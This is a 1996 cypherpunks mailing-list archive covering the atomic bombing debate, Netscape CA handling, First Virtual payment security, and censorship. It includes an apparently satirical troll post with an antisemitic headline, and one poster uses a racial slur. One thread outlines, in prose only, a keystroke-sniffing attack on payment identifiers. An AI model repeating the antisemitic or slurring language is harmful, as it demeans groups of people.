/jordan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 4 Feb 1996 04:35:10 +0800
To: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Subject: RE: Sometimes ya just gotta nuke em
In-Reply-To: <960203083305.2020cd29@hobbes.orl.mmc.com>
Message-ID: <Pine.SOL.3.91.960203120218.12976A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 3 Feb 1996, A. Padgett Peterson, P.E. Information Security wrote:

> And the biggest secret of the war was that "Fat Man" was the *last* A-bomb
> we had or could build for about a year (had taken several *years* to
> separate enough fissionable material for the three via two entirely
> different processes).

So secret even Gen. Groves was unaware of it- he was so misled that he 
thought he would have the next Fat Man finished on the 12th or 13th 
August 1945, and ready for dropping on the 17th/18th of August. 

PerryDeflector: Guess they must have used some pretty funky codes eh?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Sun, 4 Feb 1996 01:36:50 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Futplex makes the news!
In-Reply-To: <ad3810aa1e021004cc23@[205.199.118.202]>
Message-ID: <199602031721.MAA07583@hammond.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves writes:
 > AP story in Boston Globe (long and ludicrous on-line URL, and OK, so this 
 > is not the greatest story, but I think it's somewhat positive):
 > 
 >  http://www.boston.com/globe/ap/cgi-bin/retrieve?%2Fglobe%2Fapwir%2F033%2Freg%2Fag052102

This article appears to have moved to a different, but equally
ludicrous URL:

http://www.boston.com/globe/cgi-bin/waisgate?WAISdocID=6775428472+0+0+0&WAISaction=retrieve

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jordan Hayes <jordan@Thinkbank.COM>
Date: Sun, 4 Feb 1996 04:48:49 +0800
To: cypherpunks@toad.com
Subject: Re: Sometimes ya just gotta nuke em
Message-ID: <199602032025.MAA01565@Thinkbank.COM>
MIME-Version: 1.0
Content-Type: text/plain


#if !defined(perry)

	From tcmay@got.net Fri Feb  2 21:32:22 1996

	A land invasion of Japan would've likely cost half a million
	American lives, and perhaps a million or more Japanese
	citizen lives, according to comprehensive studies I think
	are on the mark.

Sorry to inject a little scholarly research on this topic, but I
would urge those of you who are interested in how this mythology
was created and disseminated to do an AltaVista serach for Alperovitz;
he's potentially the leading scholar on this subject.  I've read
his book, and Tim probably ought to as well ...

If you read nothing else on this topic, I urge you to check out
an interview with him at http://www2.ari.net/home/bsabath/950711.html

#endif

/jordan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gimonca@skypoint.com (Charles Gimon)
Date: Sun, 4 Feb 1996 02:41:19 +0800
To: ErnstZundl@aol.com
Subject: Re: THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
In-Reply-To: <960203124656_311380557@emout09.mail.aol.com>
Message-ID: <m0timer-0005VgC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> If you are a *true* Patriot, and a *true* Aryan, then you *MUST*
> make the journey to Antarctica and into the volcano!!  We owe it to
> the world, we owe it to the great Adolph Hitler, and we owe it to
> the White Race.
> 
> And please bring a sweater.  It's cold!
> 

Hey buddy--it was 32 below zero in Minneapolis this week, not 
including wind chill! I'm packin' swim trunks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Maggie Heineman <maggie@critpath.org> (by way of carolann@censored.org (Censored Girls Anonymous))
Date: Sun, 4 Feb 1996 03:00:34 +0800
To: cypherpunks@toad.com
Subject: FYI: Free calls to Congress
Message-ID: <199602031833.LAA19465@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


You too can call and complain about the CDA if you like.
Or any CRYTPO RELATED idea you fell revelant!

Love Always,

Carol Anne
         -  Please repost far and wide -  
  
>     The following two telephone numbers will connect anyone in the U.S. to 
>     the Capitol switchboard from where they can connect to any 
>     Congressional office:
>     
>     1-800-962-3524 
>     1-800-972-3524
>     
>     The numbers are courtesy of the Christian Coalition which is providing 
>     them to its members (and now to us).  Please feel free to forward this 
>     message to friends and family.

----------------------------------
It works!  -- I tested both the 962 and 972 numbers. 

Same dialogue on both calls -  

Operator:  Capital
Me:  Is this the Capital Switchboard?
Operator:  Yes.
Me:  I'd like to have Chaka Fattah's office, please
Ansering Machine: You have reached the office of Chakkah Fattah...

--------------------------
Relayed - The original poster (I think) was


>  ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
>  + To send a message across the listserv, send your e-mail message    +
>  +                 To: lev-zev@igc.apc.org                            +
>  + To unsubscribe, send a message containing "unsubscribe LEV-ZEV"    +
>  +                 To: majordomo@igc.apc.org                          +
>  + Problems or Questions:                                             +
>  +                 mail: jpierotti@tcn.org                            +
>  + *Suggested SUBJECT prefixes when sending messages to the listserv* +
>  +                 ALERT:, MEDIA RELEASE:, or FYI:                    +
>  ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Maggie 
=======================================================================
Margaret Andrus Heineman [maggie@critpath.org]
Fight the Right Network (Philadelphia)
-- http://www.critpath.org/ftrn/
Webmaster, PFLAG on the Web 
-- http://www.critpath.org/~maggie/pflag/   

Keep remembering: they are against the free flow of information.  
Anything you can do to increase information flow hurts them . -Purdom 
========================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ErnstZundl@aol.com
Date: Sun, 4 Feb 1996 02:05:07 +0800
To: bootboy@airmail.net
Subject: THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
Message-ID: <960203124656_311380557@emout09.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!

Recently several Jewish co-conspirators have tried to silence
me!  I finally go onto Usenet to make myself open for debate,
and the Communist conspirators write to the AOL postmaster
and ask that they remove my account!

Below are some messages I received from some of those
people who do not believe in Free Speech.  *I* believe in 
Free Speech.  Without Free Speech, I would be unable to
declare which books I feel should be burned, who should
be persecuted, and who should be declared to be inferior
or part of a race-wide conspiracy like the "Holocaust."

Please do not send email to the people who complained
about me.  I beleive in Free Speech, and so I believe in
their right to complain about me.  I also believe that it
just demonstrates that they are willing Fellow Travelers
in the worldwide Communist Conspiracy, they are friends
of the Black Helicopters of the United Nations, and they are
enemies of the Aryan Nazi UFO's at the center of the Earth.

Now, fellow Patriots and Supermen Aryans, read their
messages and tell me what you think?

>> Subj:  Re: TOS violations
>> Date:  Mon, Jan 29, 1996 8:23 PM EDT
>> From:  freedom@pathcom.com
>> X-From: freedom@pathcom.com (Marc Lemireberg)
>> To: postmaster@aol.com
>> CC: ernstzundl@aol.com, Mossad@israel.gov

>> Dear Sir/Madam:

>> An American Online user is repeatedly violating AOL's Terms of Service
>> on USENET.  Please read a sample post below.

>> He is a controversial Canadian publisher, Ernst Zundel,
>> who beleives in "Free Speech."  I personally do *NOT*
>> believe in "Free Speech" because I am a Jewish Communist. 
>> His continued posting from AOL could bring legal action
>> against your company, because that is what Jewish Communists
>> like me do.  It is the only way to keep the Aryan Space Nazi
>> UFO Mothership from vaporizing the world.

>> Please correct this problem by informing the user of his
>> politically incorrect activity.

>> Thank you.

>> -- Marc Lemireberg
>>*******************************************************
>>          **                DIGITAL CENSORSHIP BBS                **
>>          **     Canada's most Politically Correct BBS, access on    **
>>          ** FIRST call, 100% FREE, NOW 2.1 GIGABYTES ONLINE!! **
>>          **                        ^^^^^^^^^^^^^^^^^^^^^^^^^^ **
>>          **        Node 1 (417) 462-3328 28.8 V.34            **
>>          **        Node 2 (417) 465-4768 14.4 V.42            **
>>           
>> *******************************************************

>> Date:  Mon, Jan 29, 1996 1:26 AM EDT
>> From:  declan+@CMU.EDU
>> X-From: declan+@CMU.EDU (Declan B. McCullagh)
>> To: cypherpunks@toad.com
>> CC: ernstzundl@aol.com, fight-censorship+@andrew.cmu.edu,
postmaster@aol.com

>> Ernst Zundel is the Neo Nazi Hatemonger who sparked the Wiesenthal
>> Center's attempts at censorship, and the latest move by the German
>> government.

>> Now an AOL alias, "ernstzundl@aol.com", is being used in the course of an 
>> effective propoganda spree on Usenet newsgroups including >>
alt.skinheads, alt.mindcontrol, and alt.fan.ernst.zundel.

>> Now, the Wiesenthal Center Censors are enraged over this attempt to
>> popularize the evil Ernst Zundel.  He and his legions of Aryan Supermen
>> of superior strength and intellect *must* be stopped from unleashing the
>> horror of intersteallar war upon Israel.  AOL is Earth's last defense
against
>> the Interstellar Aryan Space Nazis lead by Ernst Zundel.

>> As a card-carrying member of the Jewish Communist Conspiracy, I must
>> protest Mr. Zundel's acts of "Free Speech." Shalom, Fellow Travelers!


>> Subj:  No Subject
>> Date:  Tue, Jan 30, 1996 11:13 AM EDT
>> From:  ca314@freenet.uchsc.edu

>> I hate Aryan Nazis from Space.  I will oppose them when they land
>> on Earth!


>> Subj:  Re: Ernst Zundel Says: Join the Aryan Corps!!! 
>> Date:  Sun, Jan 28, 1996 11:28 PM EDT
>> From:  hoel@eng.usf.edu
>> X-From: hoel@eng.usf.edu (Matthew Hoelstein (EE))
>> To: ernstzundl@aol.com (ErnstZundl)

>> Get out of misc.activism.militia!  Real patriots are not racist-- they
just
 >> hate Jews, Blacks, Catholics, and anyone who is "different".  People 
>> like me are really just Jews controled by the Zionist Occupied Government,
>> and the Militias are really just a way to help Israel seize more power. 

>>       Matthew D. Hoelstein, Milita Commander
>>       hoel@suntan.eng.usf.edu


>> Subj:  Re: Aryan Corps Operations Specialist????????
>> Date:  Sat, Jan 27, 1996 6:19 PM EDT
>> From:  bootboy@airmail.net
>> X-From: bootboy@airmail.net (Bootboy)
>> To: ernstzundl@aol.com (ErnstZundl)

>> Get off the internet, German Swine!
>> Sh'ma y'israel!
>> -Bootboy-  88/14
>> Jewish Skinheads U.S.A.
>> http://web2/airmail.net/bootboy/



*** Now do you see what kind of censorship I am up against???

If you want to help me, please DO NOT email the people above to complain.

Instead, you can help me in my cause to make the Earth safe for White
children.
You can help me by joining me and my legions of Aryan Nazi UFO Supermen
at the center of the Earth.  All you have to do to get there is enter the
Earth's center by way of a volcano in Antarctica.

If you are a *true* Patriot, and a *true* Aryan, then you *MUST*
make the journey to Antarctica and into the volcano!!  We owe it to
the world, we owe it to the great Adolph Hitler, and we owe it to
the White Race.

And please bring a sweater.  It's cold!








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Sun, 4 Feb 1996 06:00:54 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape, CAs, and Verisign
In-Reply-To: <199602030951.BAA12320@ix2.ix.netcom.com>
Message-ID: <3113D385.2781@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart wrote:
> 
> At 06:50 PM 1/30/96 -0500, Phill wrote:
> > Question is how can Netscape (or anyone else) _securely_ allow an
> > arbitrary CA's certificate to be used? Certainly the process cannot
> > be automatic. Binding the Verisign public key into the browser may
> > be an undesirable solution, but the problem is to think of a better
> > one.
> 
> It's easy, and I gather Netscape has done it in 2.x - let the _user_
> decide what CAs to trust.  For convenient verification, you can have
> the user sign the keys for each of the CAs, and then the
> chain-following software only needs to compare each certificate's
> signer with the user's own pubkey, rather than comparing with
> Verisign's.  If you want to be automatic about it, you _could_ have
> the user sign Verisign's key when first generating keys, or you could
> ask the user the first time.

In 2.0, what we do is maintain a database of certificates that have
various trust attributes.  We ship this database with a number of CAs
that we feel confident in, but the user can add and delete CAs if he
wants.

When the Navigator is presented with a certificate that it can't
verify (the CA isn't in the database), the user is prompted as to
whether or not to trust the site and whether to trust it permanently, or
just for this session.

The Navigator can also download certificates as one of the following
mime types:

application/x-x509-ca-cert
application/x-x509-server-cert
application/x-x509-user-cert

When the Navigator sees one of these, it presents the user with a
series of dialog boxes that take him through the process of approving
the certificate and adding it to the database.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 4 Feb 1996 03:00:28 +0800
To: jamie@voyager.net
Subject: Re: THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
In-Reply-To: <960203124656_311380557@emout09.mail.aol.com>
Message-ID: <ol4ufG600YUtE8phBl@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 3-Feb-96 THE JEWS (ALL of them!)
Try.. by ErnstZundl@aol.com 
> >> Date:  Mon, Jan 29, 1996 1:26 AM EDT
> >> From:  declan+@CMU.EDU
> >> X-From: declan+@CMU.EDU (Declan B. McCullagh)
> >> To: cypherpunks@toad.com
> >> CC: ernstzundl@aol.com, fight-censorship+@andrew.cmu.edu,
> postmaster@aol.com

[...]

> >> Now, the Wiesenthal Center Censors are enraged over this attempt to
> >> popularize the evil Ernst Zundel.  He and his legions of Aryan Supermen
> >> of superior strength and intellect *must* be stopped from unleashing the
> >> horror of intersteallar war upon Israel.  AOL is Earth's last defense
> against
> >> the Interstellar Aryan Space Nazis lead by Ernst Zundel.
>  
> >> As a card-carrying member of the Jewish Communist Conspiracy, I must
> >> protest Mr. Zundel's acts of "Free Speech." Shalom, Fellow Travelers!

Damn, he blew my cover. I shall seek vengeance with my orbital
mindcontrol lasers.

Shalom,

Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sethf@MIT.EDU
Date: Sun, 4 Feb 1996 03:10:09 +0800
To: bootboy@airmail.net
Subject: THE JEWS (ALL of them!) Try to kick Ernst Zundel off Usenet!!
Message-ID: <9602031850.AA18675@frumious-bandersnatch.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


	HOLD YOUR FLAMES! That message looks like a troll designed to
set us all off arguing. DON'T FEED THE TROLL.

--
Seth Finkelstein  				sethf@mit.edu
Disclaimer : I am not the Lorax. I speak only for myself.
Freedom of Expression URL http://www.mit.edu:8001/activities/safe/home.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 3 Feb 1996 22:14:16 +0800
To: cypherpunks@toad.com
Subject: What is this threat?
Message-ID: <199602031355.OAA20420@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous questioned the meaning of the FBI-DECA 
national security threat:

>Perception management and active measures activities.

----------


Updated "The Puzzle Palace" will have more on this.

"Perception management" means any method used to conceal
intelligence or counterintelligence -- HUMINT, ELINT,
SIGINT, etc. -- including encryption or other operations
or communication technologies not accessible to, or
comprehensible by, the USG.

"Active measures activities" means any operations, human,
technological or administrative, that threaten the US.

The threat is a catch-all for interference with, or 
operation against intelligence and counterintelligence, 
surveillance and counter-surveillance or any other means 
used by the USG to protect against threats.

Its obscurity is used to cover in general what is not
covered explicitly by the other six well-known threats 
-- and to avoid revealing details of what is known or 
may yet be discovered.

It points to USG, and likely international, operations 
more blackly cloaked than those garishly paraded.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Sun, 4 Feb 1996 04:50:48 +0800
To: stewarts@ix.netcom.com>
Subject: Re: Crypto suggestion - re: Fatal Flaws in Credit Cards
In-Reply-To: <199602030951.BAA12301@ix2.ix.netcom.com>
Message-ID: <Yl4wA_mMc50eR5ggBj@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.cypherpunks: 3-Feb-96 Crypto suggestion - re: Fat..
Bill Stewart@ix.netcom.c (2735*)

> Nathaniel's written about the "fatal flaw" in any system that
> involves typing credit card numbers into your computer being that
> they're easy for a keyboard-sniffer or similar cracker to recognize.
> An obvious work-around for this (and for many of the problems with
> Social Security / Taxpayer ID numbers) is to use some sort of smartcard
> that generates one-shot numbers that the credit card company (or tax thugs)
> can map back to the "real" owner's ID.  

Absolutely true.  If you go back to my original post, I mentioned smart
cards as one possible solution.  Once you add smart cards, you don't
have the system I described as fatally flawed, which is software-only
encryption of credit card numbers.  -- NB
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Sun, 4 Feb 1996 04:49:09 +0800
To: jsw@netscape.com>
Subject: Re: FV, Netscape and security as a product
In-Reply-To: <199601311753.JAA18008@darkwing.uoregon.edu>
Message-ID: <sl4wCvKMc50e95ghMA@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.cypherpunks: 31-Jan-96 Re: FV, Netscape and securi..
Jeff Weinstein@netscape. (985*)

> > Netscape and FV have both taken a
> > "security is a product" stance, which is a gross misrepresentation.

>   We are definitely moving away from the "security is a product" stance
> that you mention.  It was definitely overdone in the early days of the
> product, but after the security bugs of the summer I and others were
> able to convince marketing that they should back off.  I want it to
> be clear what our product can and can not do.  For example, SSL can
> only protect data in transit between two machines.  If either machine
> is compromised then the data can be stolen at that end.  Our product
> does not attempt to secure the user's machine, and can not operate
> securely on an insecure machine.  Expect to see warnings and disclaimers
> of this nature from us in the future.

I applaud this clear, sensible, and correct statement.  Nicely put, Jeff.

I don't think it's fair for Greg to characterize our approach as
"security is a product".  Quite the contrary, we keep talking about
security as a *process*.  It's made up of multiple layers, which may
include digital signatures, encryption, hard-to-sniff identifiers,
out-of-band mechanisms, confirmation loops, vigorous investigation of
attempted fraud, and probably many other things, not to mention more
"traditional" aspects of server-level security.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Sun, 4 Feb 1996 04:57:06 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Flaw in Netscape rejoinder (was Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards)
In-Reply-To: <01BAEF34.AA95ECC0@ploshin.tiac.net>
Message-ID: <Il4wSxCMc50eB5gVAo@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.cypherpunks: 1-Feb-96 Re: Flaw in Netscape rejoin..
Jeff Weinstein@netscape. (10884*)

>   You would not send the FV ID to the "bad guys" until you saw a complete
> FV transaction take place.  You remember the ID when you see it, but
> only send it after seeing the e-mail verification message.

But there's no obvious correlation between the VirtualPIN as it appears
in the web transaction and the message that comes back!  In other words,
what you might be sniffing for in the web page would be a form that said
"Enter your Virtual PIN here".  But what comes back will be a mail
message that does NOT include the Virtual PIN and in which there's no
way that I can think of to do the correlation.  (That's a design
feature.)  This means that your algorithm will trigger if the host
machine gets ANY transfer-query back from FV, but it might not be
associated with the VirtualPIN that you previously intercepted.  The
correlation at this stage is VERY hard, and when you misfire, our fraud
department gets a quick heads up.

>   It should be quite easy to determine what protocol a user uses to read
> their mail from within winsock.  If we want to limit it to pop3 users, we
> could just keep track of connections to port 110.  As noted before, if
> they don't use pop we don't target them.

But you don't know, when you intercept a Virtual PIN, whether you've
intercepted the one that belongs to the user whose machine you've
infected.  This scheme will break down very quickly in "promiscuous"
environments like universities, CyberCafes, etc.  How will your attack
program know not to make the wrong decision in any environment where
more than a single user ever uses the machine?

The point is that if it misfires with any frequency at all -- even 1% of
the time -- we'll get some quick heads up about the ongoing fraud.

>   With the explosive growth of internet connected PCs, I think that
> the number of people who "surf" and read e-mail on different machines
> is dwindling rapidly.  I am happy to skip those old guard of the
> internet and concentrate on the newbies who only have one computer
> and one account.

Yes, I certainly understand that this is Netscape's product strategy,
and I think it is a VERY GOOD ONE at the level of selling tools to
users, which you guys are clearly great at.  However, the Internet
really is very heterogeneous, and is likely to continue to be so. 
Trends like CyberCafes are likely to make there continue to be a large
number of non-personal machines for a long time to come.  And unless
your attack program can figure out how NOT to infect such machines, it's
going to tip its hand fairly fast, especially since such machines will
probably be among the MOST vulnerable to various kinds of automated
infection.

>   I still think that someone could construct an attack against the
> current FV system using the techniques I've described.  It would be
> more complicated to construct than the keyboard attack but that has
> been proven time and again not to be a barrier.  Someone who could
> construct the Morris worm or the year ago IP spoofing attacks could
> do it. 

I think we're already way beyond that in complexity, and you still
haven't outlined all the necessary pieces of a successful automated
attack.  But even if you are eventually successful in devising an
automated attack on FV, it's already clear that it's going to be far,
far more complicated than the attack we've outlined on
software-encrypted credit card numbers.  If you take seriously the
notion that an automated attack should be as hard as possible, I think
the advantages of our system are already crystal clear.

>   I think that you may have to rethink some of your assumptions that
> were valid back when you designed the system, but are no longer given
> the current growth and changing demographics of the internet.

I like CyberCafes.  I like public access terminals in airports and
universities.  I like programs that create "terminal rooms" in the inner
cities to allow disadvantaged people to access the net.  All of these
are part of the current growth and changing demographics of the
Internet, too.

I do agree with you that if the Internet becomes much more homogeneous,
an automated attack on FV will become easier.  EVERYTHING becomes more
vulnerable in a homogeneous world, as in an ecosystem.  Diversity helps
to protect the health of the overall ecology.  Fortunately, I don't see
extreme homogeneity coming to the Internet any time soon.  Major
platforms from Microsoft and Netscape, for example, might well attain
80% market dominance, but the remaining 20% has a vital role to play in
keeping the net healthy.  Helping to thwart a complex automated attack
is just one example of this more general observation.

>   I'd really like to see some effort spent on closing some of the more
> gaping holes in the underlying systems.  Why should it be so easy
> for one program to snoop on the keystrokes directed to another?
> Why should it be so easy for a program downloaded from the net
> to patch a part of the operating system?

Agreed completely.  On the other hand, trends from OS vendors seem to be
moving in quite the opposite direction.  Think about "click here to
execute" in mail or news postings on the Microsoft Network.  And someone
recently told me (don't know if it's true) that Microsoft's OCX
architecture for executable web content is the best avenue yet for
creating Trojan Horses......  And I, for one, am deeply uneasy about
Java's security model, too.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paralax@alpha.c2.org
Date: Sun, 4 Feb 1996 08:05:30 +0800
To: cypherpunks@toad.com
Subject: Re: Sometines ya just gotta nuke em-and nuke em again
Message-ID: <199602032339.PAA08244@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


At 15:54:04 -0800 )2-03-96 Timothy C. May wrote:

> I regret that Jordan Hayes believes a condescending tone, implying others
> are not as scholarly as he, is the way to make a point.

> (I've also received several long articles from people who seemed outraged
> that I was belittling the dropping of the bomb. I wasn't belittling it. Far
> from it. The Japs surrendered after the second bomb, so it was obviously
> not a trivial matter to them.)

Mr. Hayes MAY have used a condescending tone but you have exposed your
racist roots again.  First you embarass yourself with you lack of knowledge,
sensitivity and understanding about all things Jewish and now you insult an 
entire race with the use of the word "Jap".

Stick to cypher related topics - - - - - -  You're elevating the Ugly American to
another level altogether.

A. Paralax View




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Sun, 4 Feb 1996 05:11:38 +0800
To: jwz@netscape.com>
Subject: Re: C'mon, How Hard is it to Write a Virus or Trojan Horse? (was Re: Apology and clarification)
In-Reply-To: <310E0EBE.30FD3BCC@netscape.com>
Message-ID: <Il4wYiWMc50eN5gWN7@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.cypherpunks: 1-Feb-96 Re: C'mon, How Hard is it t..
Jamie Zawinski@netscape. (2014*)

> > Is it your position that no systematic flaw in your security is real
> > until someone has actually broken it?

> Of course not.  You don't have to actually break it to show that it's
> possible.

> Of course, you *do* have to show the likelyhood of success and effort
> required to pull it off as well before it's interesting at all, whether
> it's theoretically possible or not.

OK, let's try this again:  Is it your position that the hardest part of
the attack we've outlined is the large-scale infection of consumer's
machines with untrusted code, using a virus, Trojan Horse, or some other
method?  And that this attack is not serious because doing that is
prohibitively difficult?  If so, I agree with the first claim but not
the second.  But I'm really trying to get clear about your position
here.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 4 Feb 1996 07:03:45 +0800
To: cypherpunks@toad.com
Subject: Sometimes ya just gotta nuke em--and nuke em again
Message-ID: <ad392186040210048141@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:25 PM 2/3/96, Jordan Hayes wrote:

>Sorry to inject a little scholarly research on this topic, but I
>would urge those of you who are interested in how this mythology
>was created and disseminated to do an AltaVista serach for Alperovitz;
>he's potentially the leading scholar on this subject.  I've read
>his book, and Tim probably ought to as well ...

I have responded privately to Jordan Hayes on this issue. Reasonable people
can disagree on historical events, and historical motives, and certainly
the "decision to drop the bomb" has long been a contentious one.

I regret that Jordan Hayes believes a condescending tone, implying others
are not as scholarly as he, is the way to make a point.

(I've also received several long articles from people who seemed outraged
that I was belittling the dropping of the bomb. I wasn't belittling it. Far
from it. The Japs surrendered after the second bomb, so it was obviously
not a trivial matter to them.)

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sun, 4 Feb 1996 08:28:52 +0800
To: stephan.mohr@uni-tuebingen.de (Stephan Mohr)
Subject: Re: free speach and the government
In-Reply-To: <2.2.16.19960203234059.2eb7ed1c@mailserv.uni-tuebingen.de>
Message-ID: <199602040002.QAA11844@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Stephan Mohr writes:
> 
> Well, I feel that I agree with the people on the right of free speech for
> i.e. the neo-nazi stuff or other political, ideological and/or religious
> ideas. But there is still something that leaves me uneasy: imagine there
> would be a way to easily make a powerful poison, easily applicated to
> your town's water-reservoir, or a very easy way to build some strong
> explosive device. etc. Actually, I think that stuff like this does exist
> already.
> 
> But the idea that one day I just put 'easy made deadly poison for millions'
> into my webcrawler and whoop there it is on my screen or on the screen of any
> other fool, doesn't sound to right to me. I would like things like this
> to be better put aside and locked up.

You can't put the genie back into the bottle.
Once something is invented or described, the knowledge
is out there.  Someone who wants to use that knowledge
for "wrong" purposes can find it.

Maybe a lot of people around the world could agree that
the knowledge to make something really dangerous (say Sarin nerve gas) 
should be suppressed.  But where do we draw the line?  If
we, or rather our government acting obstensibly in our interest, decides
to supress the information on how to make Sarin, not too many people
will complain.  But the tendency of governments is to regulate and
restrict and tax more.   What happens when governments suppress
knowledge on how to make gunpowder?  Or printing presses?  Or
encryption?

Many people argue (rightly IHMO) that once started on the slippery slope
of suppressing knowledge there's no stopping until we're all
under the boot heel of the police state.

[..]
> I know, of course, that by accepting that there is something that
> shouldn't be available on the net, we would need something to decide what
> and how to ban. So I wonder what would be a more 'net'-like way of handling 
> this type of thing and how to prevent that some 'strong-armed' governments
> take the net over.

So far the "net-like" way to deal with the problem is to not
supress information at all, and instead assume that people are
intelligent enough to make their own choices on what to do
with "dangerous" information.

 
> I do not see tokay's governments being prepared for the net (at least not
> the German one). But I see them trying to put the 'old' laws onto the net.
> Not because they are mean, but because they don't know any better. So, I
> think it would be nice to have something to offer to them. I do not think though
> that they will accept the totally right of free speech (yet). 

No government will accept net-speech that's any freer than
any other speech in that country.

In the US the media is by and large controlled by huge
media conglomerates with a vested interest in maintaining
the status quo and delivering up their audience to their
advertisers in tidy packages.

The government is along for the ride, being part and parcel
of the same system.  They won't rest until net-speech is
by and large controlled by huge media conglomerates all
busy delivering up the net-public to advertisers in tidy
packages... I'm not saying that there's a Black Heliocopters
type conspiracy, or any other for that matter.  There doesn't
have to be, there are huge political forces moving things
this way.  So there might as well be a conspiracy, as the
end effect on us is the same.


I think that any compromise with government censorship is a bad idea.
All we'd do is give them a little more while on the way towards the
inevitable.  If we don't give them all the censorship power they
want they'd just take it anyhow.  Better to hold out as well as
we can while we can.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
 Fuck Exon and the Communications "Decency" Act!  US off the Internet now!
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 4 Feb 1996 05:40:14 +0800
To: cypherpunks@toad.com
Subject: GNU_kum
Message-ID: <199602032124.QAA24024@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   2-3-96. FinTim:

   "World's financial police to cast money laundering net
   wider."

      The plan needs to address issues raised by cybercash.
      These technologies pose a threat but answers should
      not be dated as soon as published. Officials want 
      developers of new technologies to consider their 
      criminal potential before launch, to avoid clampdown 
      afterwards. Possible safeguards against the misuse of 
      electronic purses may include limiting their maximum 
      value or restricting use to closed systems.


   "Communist to capitalist." [Book review]

      China's Rise, Russia's Fall, by Peter Nolan.

      Nolan says China's leaders had the self-confidence to
      chart their own evolutionary approach, largely
      preserving state institutions at a central and regional
